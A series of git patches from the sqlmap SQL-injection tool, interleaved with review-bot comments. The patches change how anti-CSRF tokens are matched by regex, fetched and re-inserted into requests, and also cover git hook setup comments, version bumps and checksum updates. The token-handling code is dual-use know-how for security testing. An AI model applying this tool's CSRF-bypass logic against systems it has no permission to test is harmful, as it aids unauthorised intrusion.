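Review bot: Collapsing the validation into `if not choice or not choice.isdigit() or int(choice) > maxValue or int(choice) < 1: choice = default` drops both `logger.warn` calls, so a typo or out-of-range number is now silently replaced by the default with no feedback; keeping one warning before the fallback, e.g. `logger.warn("invalid value, falling back to default (%d)" % default)`, preserves that while still avoiding the re-prompt loop that presumably lies behind #3397. Note that `int(choice)` is only safe because `isdigit()` short-circuits first, so the order of the `or` terms must stay as written; a comment saying so would prevent a future reorder. _skeletonSelection starts outside the hunk.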
@@ -3509,9 +3509,9 @@ def listToStrValue(value): return retVal -def intersect(valueA, valueB, lowerCase=False): +def intersect(containerA, containerB, lowerCase=False): """ - Returns intersection of the array-ized values + Returns intersection of the container-ized values >>> intersect([1, 2, 3], set([1,3])) [1, 3] @@ -3519,15 +3519,15 @@ def intersect(valueA, valueB, lowerCase=False): retVal = [] - if valueA and valueB: - valueA = arrayizeValue(valueA) - valueB = arrayizeValue(valueB) + if containerA and containerB: + containerA = arrayizeValue(containerA) + containerB = arrayizeValue(containerB) if lowerCase: - valueA = [val.lower() if isinstance(val, basestring) else val for val in valueA] - valueB = [val.lower() if isinstance(val, basestring) else val for val in valueB] + containerA = [val.lower() if isinstance(val, basestring) else val for val in containerA] + containerB = [val.lower() if isinstance(val, basestring) else val for val in containerB] - retVal = [val for val in valueA if val in valueB] + retVal = [val for val in containerA if val in containerB] return retVal From f81062d5957d4618ba0bc2fe994aa2651641cce1 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Mon, 10 Dec 2018 13:20:34 +0100 Subject: [PATCH 381/428] Resolving some more hooking problems --- extra/shutils/postcommit-hook.sh | 10 ++++++++++ extra/shutils/precommit-hook.sh | 10 ++++++++++ lib/core/settings.py | 2 +- txt/checksum.md5 | 22 +++++++++++----------- 4 files changed, 32 insertions(+), 12 deletions(-) diff --git a/extra/shutils/postcommit-hook.sh b/extra/shutils/postcommit-hook.sh index 77ed2824c80..d5d0ed0cf07 100755 --- a/extra/shutils/postcommit-hook.sh +++ b/extra/shutils/postcommit-hook.sh @@ -1,5 +1,15 @@ #!/bin/bash +""" +cat > .git/hooks/post-commit << EOF +#!/bin/bash + +source ./extra/shutils/postcommit-hook.sh +EOF + +chmod +x .git/hooks/post-commit +""" + SETTINGS="../../lib/core/settings.py" declare -x SCRIPTPATH="${0}" 
diff --git a/extra/shutils/precommit-hook.sh b/extra/shutils/precommit-hook.sh index 3c2137ce239..624df765ab8 100755 --- a/extra/shutils/precommit-hook.sh +++ b/extra/shutils/precommit-hook.sh @@ -1,5 +1,15 @@ #!/bin/bash +""" +cat > .git/hooks/pre-commit << EOF +#!/bin/bash + +source ./extra/shutils/precommit-hook.sh +EOF + +chmod +x .git/hooks/pre-commit +""" + PROJECT="../../" SETTINGS="../../lib/core/settings.py" CHECKSUM="../../txt/checksum.md5" diff --git a/lib/core/settings.py b/lib/core/settings.py index b1f28eb9838..f45e3e8f255 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.12.8" +VERSION = "1.2.12.9" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index b054da5c7ae..7cd9422e814 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 
@@ -23,13 +23,13 @@ b3e60ea4e18a65c48515d04aab28ff68 extra/sqlharvest/sqlharvest.py 1e5532ede194ac9c083891c2f02bca93 extra/wafdetectify/__init__.py c1bccc94522d3425a372dcd57f78418e extra/wafdetectify/wafdetectify.py 3459c562a6abb9b4bdcc36925f751f3e lib/controller/action.py -71334197c7ed28167cd66c17b2c21844 lib/controller/checks.py +0f0feede9750be810d2b8a7ab159b7b0 lib/controller/checks.py 95cde6dc7efe2581a5936f0d4635cb3b lib/controller/controller.py 988b548f6578adf9cec17afdeee8291c lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py -cb865cf6eff60118bc97a0f106af5e4d lib/core/agent.py +e62309b22a59e60b270e62586f169441 lib/core/agent.py c347f085bd561adfa26d3a9512e5f3b9 lib/core/bigarray.py -9ed51d3e770b5cec2f8c91e962011d52 lib/core/common.py +9d040f1771efaab4fde8d09821a09f51 lib/core/common.py 0d082da16c388b3445e656e0760fb582 lib/core/convert.py 9f87391b6a3395f7f50830b391264f27 lib/core/data.py 72016ea5c994a711a262fd64572a0fcd lib/core/datatype.py @@ -42,14 +42,14 @@ cada93357a7321655927fc9625b3bfec lib/core/exception.py 1e5532ede194ac9c083891c2f02bca93 lib/core/__init__.py 458a194764805cd8312c14ecd4be4d1e lib/core/log.py 7d6edc552e08c30f4f4d49fa93b746f1 lib/core/optiondict.py -7dacc178910ab4d57de36c3602bde17d lib/core/option.py +9bf3349158df05775eb41742d6402ad8 lib/core/option.py c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 6783160150b4711d02c56ee2beadffdb lib/core/profiling.py 6f654e1715571eff68a0f8af3d62dcf8 lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -9f209388d9fed41480e57c8574d0111a lib/core/settings.py +e71aea1aff5751fdcdc97ba63973a603 lib/core/settings.py a971ce157d04de96ba6e710d3d38a9a8 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 52642badbbca4c31a2fcdd754d67a983 lib/core/target.py 
@@ -85,7 +85,7 @@ aaf956c1e9855836c3f372e29d481393 lib/request/methodrequest.py 747f9941a68361bd779ec760f71568e9 lib/takeover/abstraction.py acc1db3667bf910b809eb279b60595eb lib/takeover/icmpsh.py 1e5532ede194ac9c083891c2f02bca93 lib/takeover/__init__.py -46ff5840b29531412bcaa05dac190413 lib/takeover/metasploit.py +9b9aa94a1693efa7a9ae0783cfb56896 lib/takeover/metasploit.py fb9e34d558293b5d6b9727f440712886 lib/takeover/registry.py 6a49f359b922df0247eb236126596336 lib/takeover/udf.py a3d07df8a780c668a11f06be42014cdc lib/takeover/web.py @@ -96,11 +96,11 @@ db208ab47de010836c6bf044e2357861 lib/techniques/blind/inference.py 799faf9008527d2e9da9d923e50f685a lib/techniques/dns/test.py 48a24f48da791e67309003fd5e8428cb lib/techniques/dns/use.py 1e5532ede194ac9c083891c2f02bca93 lib/techniques/error/__init__.py -6007347548e85383705eaa4b863448a2 lib/techniques/error/use.py +214d916bb8b456ae698ca0f5523186ff lib/techniques/error/use.py 1e5532ede194ac9c083891c2f02bca93 lib/techniques/__init__.py 1e5532ede194ac9c083891c2f02bca93 lib/techniques/union/__init__.py f7813cdee00df8f98d6f811475e520a1 lib/techniques/union/test.py -7361338240ecd9d01d1d10ec76bce069 lib/techniques/union/use.py +dbddd178a6ca941fa745d9b3edbb979b lib/techniques/union/use.py 038ec99105c59acc2b1c6cb90e9e4043 lib/utils/api.py 37dfb641358669f62c2acedff241348b lib/utils/brute.py 31b1e7eb489eac837db6a2bc1dcb7da7 lib/utils/crawler.py 
@@ -268,8 +268,8 @@ f177a624c2cd3431c433769c6eb995e7 tamper/modsecurityzeroversioned.py dcf3458f9010ca41bc4b56804f15792c tamper/overlongutf8more.py a3a3cef042b864c4226b63f89548f939 tamper/overlongutf8.py 89f8753a0ef65d2bb860c8864e9e935a tamper/percentage.py -a47aafcbc1de2deb85160e29de46f748 tamper/plus2concat.py -759b86cf3bb1d7871dc6489538253f94 tamper/plus2fnconcat.py +cec3be164c27df01f016f6b0e0981006 tamper/plus2concat.py +167ab896d300bcea811ee61a972950e1 tamper/plus2fnconcat.py b9db4cc9fc4e0a586198340d1268fdaf tamper/randomcase.py 28626e4b8c673228dcfe4f1627a9e08b tamper/randomcomments.py cac8a56f8cc6c14524ee392daa5ae2fd tamper/space2comment.py @@ -478,7 +478,7 @@ d989813ee377252bca2103cea524c06b xml/banner/sharepoint.xml 350605448f049cd982554123a75f11e1 xml/banner/x-aspnet-version.xml ccb5e02a692f75d11b7fd00f1db48bf5 xml/banner/x-powered-by.xml 385570003bf7d84f2502191eae8268c6 xml/boundaries.xml -a676d93d413b07d36495201d88671253 xml/errors.xml +e7c893dd4f3f1d6b5b6f5ffd717d38cc xml/errors.xml a279656ea3fcb85c727249b02f828383 xml/livetests.xml 11547289b99eaced5b55185a3230529a xml/payloads/boolean_blind.xml 0656ba4132cd02477be90e65a7ddf6ce xml/payloads/error_based.xml From e47c1aa61bb14c6a7c895dad565054d28564ee4b Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Mon, 10 Dec 2018 13:21:36 +0100 Subject: [PATCH 382/428] Resolving some more hooking problems --- extra/shutils/postcommit-hook.sh | 4 ++-- extra/shutils/precommit-hook.sh | 4 ++-- lib/core/settings.py | 2 +- txt/checksum.md5 | 2 +- 4 files changed, 6 insertions(+), 6 deletions(-) diff --git a/extra/shutils/postcommit-hook.sh b/extra/shutils/postcommit-hook.sh index d5d0ed0cf07..eb3db6c4e0e 100755 --- a/extra/shutils/postcommit-hook.sh +++ b/extra/shutils/postcommit-hook.sh @@ -1,6 +1,6 @@ #!/bin/bash -""" +: ' cat > .git/hooks/post-commit << EOF #!/bin/bash @@ -8,7 +8,7 @@ source ./extra/shutils/postcommit-hook.sh EOF chmod +x .git/hooks/post-commit -""" +' SETTINGS="../../lib/core/settings.py" 
diff --git a/extra/shutils/precommit-hook.sh b/extra/shutils/precommit-hook.sh index 624df765ab8..5a9fea4246a 100755 --- a/extra/shutils/precommit-hook.sh +++ b/extra/shutils/precommit-hook.sh @@ -1,6 +1,6 @@ #!/bin/bash -""" +: ' cat > .git/hooks/pre-commit << EOF #!/bin/bash @@ -8,7 +8,7 @@ source ./extra/shutils/precommit-hook.sh EOF chmod +x .git/hooks/pre-commit -""" +' PROJECT="../../" SETTINGS="../../lib/core/settings.py" diff --git a/lib/core/settings.py b/lib/core/settings.py index f45e3e8f255..ce145fec935 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.12.9" +VERSION = "1.2.12.10" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 7cd9422e814..a105fb39ab1 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -49,7 +49,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -e71aea1aff5751fdcdc97ba63973a603 lib/core/settings.py +7535ff33c85d9b886f9e631dc0158cb9 lib/core/settings.py a971ce157d04de96ba6e710d3d38a9a8 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 52642badbbca4c31a2fcdd754d67a983 lib/core/target.py From 2c95b65eac7a5757a1583a5019fc9c2e047b54d5 Mon Sep 17 00:00:00 2001 
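Review bot: The `: '…'` block that replaces the `"""` lines is parsed by the shell rather than ignored: the text is a single-quoted argument to `:`, so any apostrophe added inside it later would close the quote and execute the remainder, and shellcheck flags the idiom. A run of `#`-prefixed lines is the conventional, inert way to keep installation instructions in a bash script. The same applies to the post-commit hook change above.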
From: Miroslav Stampar Date: Mon, 10 Dec 2018 14:53:11 +0100 Subject: [PATCH 383/428] Implementation for #2552 (sorry @mg98) --- lib/controller/controller.py | 2 +- lib/core/common.py | 2 +- lib/core/option.py | 17 ++++++++++ lib/core/settings.py | 2 +- lib/core/target.py | 4 +-- lib/request/connect.py | 64 +++++++++++++++++++----------------- txt/checksum.md5 | 12 +++---- 7 files changed, 61 insertions(+), 42 deletions(-) diff --git a/lib/controller/controller.py b/lib/controller/controller.py index 9cdc3534d1c..bc071cbdbb7 100644 --- a/lib/controller/controller.py +++ b/lib/controller/controller.py @@ -505,7 +505,7 @@ def start(): infoMsg = "skipping %s parameter '%s'" % (paramType, parameter) logger.info(infoMsg) - elif parameter == conf.csrfToken: + elif re.search(conf.csrfToken, parameter, re.I): testSqlInj = False infoMsg = "skipping anti-CSRF token parameter '%s'" % parameter diff --git a/lib/core/common.py b/lib/core/common.py index 820a881f9a6..8c103814ffb 100644 --- a/lib/core/common.py +++ b/lib/core/common.py @@ -600,7 +600,7 @@ def paramToDict(place, parameters=None): if condition: testableParameters[parameter] = "=".join(parts[1:]) - if not conf.multipleTargets and not (conf.csrfToken and parameter == conf.csrfToken): + if not conf.multipleTargets and not (conf.csrfToken and re.search(conf.csrfToken, parameter, re.I)): _ = urldecode(testableParameters[parameter], convall=True) if (_.endswith("'") and _.count("'") == 1 or re.search(r'\A9{3,}', _) or re.search(r'\A-\d+\Z', _) or re.search(DUMMY_USER_INJECTION, _)) and not parameter.upper().startswith(GOOGLE_ANALYTICS_COOKIE_PREFIX): warnMsg = "it appears that you have provided tainted parameter values " diff --git a/lib/core/option.py b/lib/core/option.py index 499cefb0b0e..85acb8a322f 100644 --- a/lib/core/option.py +++ b/lib/core/option.py 
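Review bot: `re.search(conf.csrfToken, parameter, re.I)` is unanchored, so a token name given as plain text such as `token` now also skips `auth_token`, `tokenizer` and any other parameter containing it, where the old equality test matched exactly; anchoring, `re.search(r"\A%s\Z" % conf.csrfToken, parameter, re.I)`, keeps exact semantics for literal names while still allowing a regex. The same unanchored search is added to `paramToDict` in lib/core/common.py in this commit. If substring matching is intended, a comment on the line would make that explicit. start() continues outside the hunk.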
@@ -1560,6 +1560,23 @@ def _cleanupOptions(): except re.error: conf.testFilter = re.escape(conf.testFilter) + if conf.csrfToken: + original = conf.csrfToken + try: + re.compile(conf.csrfToken) + + if re.escape(conf.csrfToken) != conf.csrfToken: + message = "provided value for option '--csrf-token' is a regular expression? [Y/n] " + if not readInput(message, default='Y', boolean=True): + conf.csrfToken = re.escape(conf.csrfToken) + except re.error: + conf.csrfToken = re.escape(conf.csrfToken) + finally: + class _(unicode): + pass + conf.csrfToken = _(conf.csrfToken) + conf.csrfToken._original = original + if conf.testSkip: conf.testSkip = conf.testSkip.strip('*+') conf.testSkip = re.sub(r"([^.])([*+])", r"\g<1>.\g<2>", conf.testSkip) diff --git a/lib/core/settings.py b/lib/core/settings.py index ce145fec935..9edfaa5ccee 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.12.10" +VERSION = "1.2.12.11" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/core/target.py b/lib/core/target.py index a89c0c89143..1b8232a3227 100644 --- a/lib/core/target.py +++ b/lib/core/target.py 
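Review bot: The new `--csrf-token` block in `_cleanupOptions` turns `conf.csrfToken` into a `unicode` subclass carrying `_original` without saying why, and every later consumer on this page (`target.py`, `connect.py`) depends on that attribute; a comment above `finally:` such as `# conf.csrfToken is used as a regex from here on; ._original keeps the literal the user typed, for messages` is needed. Note also that Python 2 `re.escape` escapes `_`, so an ordinary name like `csrf_token` already satisfies `re.escape(conf.csrfToken) != conf.csrfToken` and triggers the prompt; under the `Y` default (and presumably under `--batch`) a literal name containing `.` or `[` is then silently treated as a pattern. The same `class _(unicode)` wrapper is duplicated in the 'Fixes #3403' commit below, which argues for one small shared helper. `_cleanupOptions` starts outside the hunk.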
@@ -393,8 +393,8 @@ def process(match, repl): raise SqlmapGenericException(errMsg) if conf.csrfToken: - if not any(conf.csrfToken in _ for _ in (conf.paramDict.get(PLACE.GET, {}), conf.paramDict.get(PLACE.POST, {}))) and not re.search(r"\b%s\b" % re.escape(conf.csrfToken), conf.data or "") and conf.csrfToken not in set(_[0].lower() for _ in conf.httpHeaders) and conf.csrfToken not in conf.paramDict.get(PLACE.COOKIE, {}): - errMsg = "anti-CSRF token parameter '%s' not " % conf.csrfToken + if not any(re.search(conf.csrfToken, ' '.join(_), re.I) for _ in (conf.paramDict.get(PLACE.GET, {}), conf.paramDict.get(PLACE.POST, {}))) and not re.search(r"\b%s\b" % re.escape(conf.csrfToken), conf.data or "") and conf.csrfToken not in set(_[0].lower() for _ in conf.httpHeaders) and conf.csrfToken not in conf.paramDict.get(PLACE.COOKIE, {}): + errMsg = "anti-CSRF token parameter '%s' not " % conf.csrfToken._original errMsg += "found in provided GET, POST, Cookie or header values" raise SqlmapGenericException(errMsg) else: diff --git a/lib/request/connect.py b/lib/request/connect.py index 8d46dbc7f6e..37ec0fc1e3c 100644 --- a/lib/request/connect.py +++ b/lib/request/connect.py @@ -64,6 +64,7 @@ class WebSocketException(Exception): from lib.core.data import conf from lib.core.data import kb from lib.core.data import logger +from lib.core.datatype import AttribDict from lib.core.decorators import stackedmethod from lib.core.dicts import POST_HINT_CONTENT_TYPES from lib.core.enums import ADJUST_TIME_DELAY 
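Review bot: The GET/POST presence check now treats `conf.csrfToken` as a regex, but the rest of the same condition still uses it as a literal (`re.escape(conf.csrfToken)` against `conf.data`, `conf.csrfToken not in ...` for headers and cookies), so a value the option layer already escaped (e.g. `csrf\_token`, since Python 2 `re.escape` escapes `_`) is escaped a second time and can never match in `conf.data`, and a user-supplied regex can never match a header or cookie name at all. Either apply `re.search(conf.csrfToken, ..., re.I)` in all four places or compare `conf.csrfToken._original` literally. The error message reads `conf.csrfToken._original`, which exists only when the value came through the option.py wrapper; the 'Fixes #3403' commit on this page covers the assignment path inside target.py itself. The enclosing function starts outside the hunk.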
@@ -960,75 +961,76 @@ def queryPage(value=None, place=None, content=False, getRatioValue=False, silent if conf.csrfToken: def _adjustParameter(paramString, parameter, newValue): retVal = paramString - match = re.search(r"%s=[^&]*" % re.escape(parameter), paramString) + match = re.search(r"%s=[^&]*" % re.escape(parameter), paramString, re.I) if match: - retVal = re.sub(re.escape(match.group(0)), ("%s=%s" % (parameter, newValue)).replace('\\', r'\\'), paramString) + retVal = re.sub(re.escape(match.group(0)), ("%s=%s" % (parameter, newValue)).replace('\\', r'\\'), paramString, flags=re.I) else: - match = re.search(r"(%s[\"']:[\"'])([^\"']+)" % re.escape(parameter), paramString) + match = re.search(r"(%s[\"']:[\"'])([^\"']+)" % re.escape(parameter), paramString, re.I) if match: - retVal = re.sub(re.escape(match.group(0)), "%s%s" % (match.group(1), newValue), paramString) + retVal = re.sub(re.escape(match.group(0)), "%s%s" % (match.group(1), newValue), paramString, flags=re.I) return retVal + token = AttribDict() page, headers, code = Connect.getPage(url=conf.csrfUrl or conf.url, data=conf.data if conf.csrfUrl == conf.url else None, method=conf.method if conf.csrfUrl == conf.url else None, cookie=conf.parameters.get(PLACE.COOKIE), direct=True, silent=True, ua=conf.parameters.get(PLACE.USER_AGENT), referer=conf.parameters.get(PLACE.REFERER), host=conf.parameters.get(PLACE.HOST)) - token = extractRegexResult(r"(?i)]+\bname=[\"']?%s\b[^>]*\bvalue=[\"']?(?P[^>'\"]*)" % re.escape(conf.csrfToken), page or "") + match = re.search(r"(?i)]+\bname=[\"']?(?P%s)\b[^>]*\bvalue=[\"']?(?P[^>'\"]*)" % conf.csrfToken, page or "", re.I) - if not token: - token = extractRegexResult(r"(?i)]+\bvalue=[\"']?(?P[^>'\"]*)[\"']?[^>]*\bname=[\"']?%s\b" % re.escape(conf.csrfToken), page or "") + if not match: + match = re.search(r"(?i)]+\bvalue=[\"']?(?P[^>'\"]*)[\"']?[^>]*\bname=[\"']?(?P%s)\b" % conf.csrfToken, page or "", re.I) - if not token: - match = re.search(r"%s[\"']:[\"']([^\"']+)" % 
re.escape(conf.csrfToken), page or "") - token = match.group(1) if match else None + if not match: + match = re.search(r"(?P%s)[\"']:[\"'](?P[^\"']+)" % conf.csrfToken, page or "", re.I) - if not token: - token = extractRegexResult(r"\b%s\s*[:=]\s*(?P\w+)" % re.escape(conf.csrfToken), str(headers)) + if not match: + match = re.search(r"\b(?P%s)\s*[:=]\s*(?P\w+)" % conf.csrfToken, str(headers), re.I) - if not token: - token = extractRegexResult(r"\b%s\s*=\s*['\"]?(?P[^;'\"]+)" % re.escape(conf.csrfToken), page or "") + if not match: + match = re.search(r"\b(?P%s)\s*=\s*['\"]?(?P[^;'\"]+)" % conf.csrfToken, page or "", re.I) - if token: - match = re.search(r"String\.fromCharCode\(([\d+, ]+)\)", token) + if match: + token.name, token.value = match.group("name"), match.group("value") - if match: - token = "".join(chr(int(_)) for _ in match.group(1).replace(' ', "").split(',')) + match = re.search(r"String\.fromCharCode\(([\d+, ]+)\)", token.value) + if match: + token.value = "".join(chr(int(_)) for _ in match.group(1).replace(' ', "").split(',')) if not token: if conf.csrfUrl != conf.url and code == httplib.OK: if headers and "text/plain" in headers.get(HTTP_HEADER.CONTENT_TYPE, ""): token = page - if not token and conf.cj and any(_.name == conf.csrfToken for _ in conf.cj): + if not token and conf.cj and any(re.search(conf.csrfToken, _.name, re.I) for _ in conf.cj): for _ in conf.cj: - if _.name == conf.csrfToken: - token = _.value - if not any(conf.csrfToken in _ for _ in (conf.paramDict.get(PLACE.GET, {}), conf.paramDict.get(PLACE.POST, {}))): + if re.search(conf.csrfToken, _.name, re.I): + token.name, token.value = _.name, _.value + if not any(re.search(conf.csrfToken, ' '.join(_), re.I) for _ in (conf.paramDict.get(PLACE.GET, {}), conf.paramDict.get(PLACE.POST, {}))): if post: - post = "%s%s%s=%s" % (post, conf.paramDel or DEFAULT_GET_POST_DELIMITER, conf.csrfToken, token) + post = "%s%s%s=%s" % (post, conf.paramDel or DEFAULT_GET_POST_DELIMITER, token.name, 
token.value) elif get: - get = "%s%s%s=%s" % (get, conf.paramDel or DEFAULT_GET_POST_DELIMITER, conf.csrfToken, token) + get = "%s%s%s=%s" % (get, conf.paramDel or DEFAULT_GET_POST_DELIMITER, token.name, token.value) else: - get = "%s=%s" % (conf.csrfToken, token) + get = "%s=%s" % (token.name, token.value) break if not token: - errMsg = "anti-CSRF token '%s' can't be found at '%s'" % (conf.csrfToken, conf.csrfUrl or conf.url) + errMsg = "anti-CSRF token '%s' can't be found at '%s'" % (conf.csrfToken._original, conf.csrfUrl or conf.url) if not conf.csrfUrl: errMsg += ". You can try to rerun by providing " errMsg += "a valid value for option '--csrf-url'" raise SqlmapTokenException(errMsg) if token: - token = token.strip("'\"") + token.value = token.value.strip("'\"") for place in (PLACE.GET, PLACE.POST): if place in conf.parameters: if place == PLACE.GET and get: - get = _adjustParameter(get, conf.csrfToken, token) + get = _adjustParameter(get, token.name, token.value) elif place == PLACE.POST and post: - post = _adjustParameter(post, conf.csrfToken, token) + post = _adjustParameter(post, token.name, token.value) for i in xrange(len(conf.httpHeaders)): - if conf.httpHeaders[i][0].lower() == conf.csrfToken.lower(): - conf.httpHeaders[i] = (conf.httpHeaders[i][0], token) + if conf.httpHeaders[i][0].lower() == token.name.lower(): + conf.httpHeaders[i] = (conf.httpHeaders[i][0], token.value) if conf.rParam: def _randomizeParameter(paramString, randomParameter): diff --git a/txt/checksum.md5 b/txt/checksum.md5 index a105fb39ab1..598fa2831da 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 
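Review bot: In the `text/plain` fallback the unchanged line `token = page` replaces the `AttribDict` with a plain string, so the later `token.value.strip("'\"")` and `token.name` accesses raise `AttributeError` on that path; the 'Fixes #3408' commit further down rewrites it. Second, `conf.csrfToken` is now interpolated unescaped into patterns that define their own named groups (the group names are not visible in this rendering), so a user regex containing a group of the same name, an unbalanced parenthesis or a backreference fails at the first `re.search` with an uncaught `re.error`; wrapping the interpolated value as `(?:%s)` makes precedence explicit and catching `re.error` there turns the failure into a `SqlmapTokenException` with a readable message. The `(?i)` inline flag and the `re.I` argument on the same calls are redundant. `queryPage` starts outside the hunk.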
@@ -24,12 +24,12 @@ b3e60ea4e18a65c48515d04aab28ff68 extra/sqlharvest/sqlharvest.py c1bccc94522d3425a372dcd57f78418e extra/wafdetectify/wafdetectify.py 3459c562a6abb9b4bdcc36925f751f3e lib/controller/action.py 0f0feede9750be810d2b8a7ab159b7b0 lib/controller/checks.py -95cde6dc7efe2581a5936f0d4635cb3b lib/controller/controller.py +93f7eabf92f3da3d96cbd8266e30414d lib/controller/controller.py 988b548f6578adf9cec17afdeee8291c lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py e62309b22a59e60b270e62586f169441 lib/core/agent.py c347f085bd561adfa26d3a9512e5f3b9 lib/core/bigarray.py -9d040f1771efaab4fde8d09821a09f51 lib/core/common.py +cf84ff84891b7f51620a457b0bff28c5 lib/core/common.py 0d082da16c388b3445e656e0760fb582 lib/core/convert.py 9f87391b6a3395f7f50830b391264f27 lib/core/data.py 72016ea5c994a711a262fd64572a0fcd lib/core/datatype.py 
@@ -42,17 +42,17 @@ cada93357a7321655927fc9625b3bfec lib/core/exception.py 1e5532ede194ac9c083891c2f02bca93 lib/core/__init__.py 458a194764805cd8312c14ecd4be4d1e lib/core/log.py 7d6edc552e08c30f4f4d49fa93b746f1 lib/core/optiondict.py -9bf3349158df05775eb41742d6402ad8 lib/core/option.py +ecf9879967182e6402f3cab6840f5b75 lib/core/option.py c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 6783160150b4711d02c56ee2beadffdb lib/core/profiling.py 6f654e1715571eff68a0f8af3d62dcf8 lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -7535ff33c85d9b886f9e631dc0158cb9 lib/core/settings.py +e0b7d1e6e148bc962df6b59d35910b92 lib/core/settings.py a971ce157d04de96ba6e710d3d38a9a8 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py -52642badbbca4c31a2fcdd754d67a983 lib/core/target.py +d6da5998fea61068a80d9c671db1095f lib/core/target.py 72d499ca8d792e90a1ebfb2ad2341a51 lib/core/testing.py cd0067d1798e45f422ce44b98baf57db lib/core/threads.py c40758411bb0bd68764d78e0bb72bd0f lib/core/unescaper.py @@ -71,7 +71,7 @@ f6b5957bf2103c3999891e4f45180bce lib/parse/payloads.py 30eed3a92a04ed2c29770e1b10d39dc0 lib/request/basicauthhandler.py 2b81435f5a7519298c15c724e3194a0d lib/request/basic.py 859b6ad583e0ffba154f17ee179b5b89 lib/request/comparison.py -77b24c30b1a2163add76652998e74127 lib/request/connect.py +9eb0cc48e7e4779e44f1641aa7d39a4d lib/request/connect.py dd4598675027fae99f2e2475b05986da lib/request/direct.py 2044fce3f4ffa268fcfaaf63241b1e64 lib/request/dns.py 98535d0efca5551e712fcc4b34a3f772 lib/request/httpshandler.py From a02662f03fc560ebb6b8b00941d56f60739d525f Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Mon, 10 Dec 2018 14:53:53 +0100 Subject: [PATCH 384/428] Trivial cleanup --- lib/core/settings.py | 2 +- lib/takeover/metasploit.py | 2 -- txt/checksum.md5 | 4 ++-- 3 files changed, 3 insertions(+), 5 deletions(-) 
diff --git a/lib/core/settings.py b/lib/core/settings.py index 9edfaa5ccee..54682d6e5be 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.12.11" +VERSION = "1.2.12.12" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/takeover/metasploit.py b/lib/takeover/metasploit.py index 356eba16acf..c7a4e18bd7d 100644 --- a/lib/takeover/metasploit.py +++ b/lib/takeover/metasploit.py @@ -20,7 +20,6 @@ from lib.core.common import Backend from lib.core.common import getLocalIP from lib.core.common import getRemoteIP -from lib.core.common import getUnicode from lib.core.common import normalizePath from lib.core.common import ntToPosixSlashes from lib.core.common import pollProcess @@ -39,7 +38,6 @@ from lib.core.settings import IS_WIN from lib.core.settings import METASPLOIT_SESSION_TIMEOUT from lib.core.settings import SHELLCODEEXEC_RANDOM_STRING_MARKER -from lib.core.settings import UNICODE_ENCODING from lib.core.subprocessng import blockingReadFromFD from lib.core.subprocessng import blockingWriteToFD from lib.core.subprocessng import Popen as execute diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 598fa2831da..791a7ad672a 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 
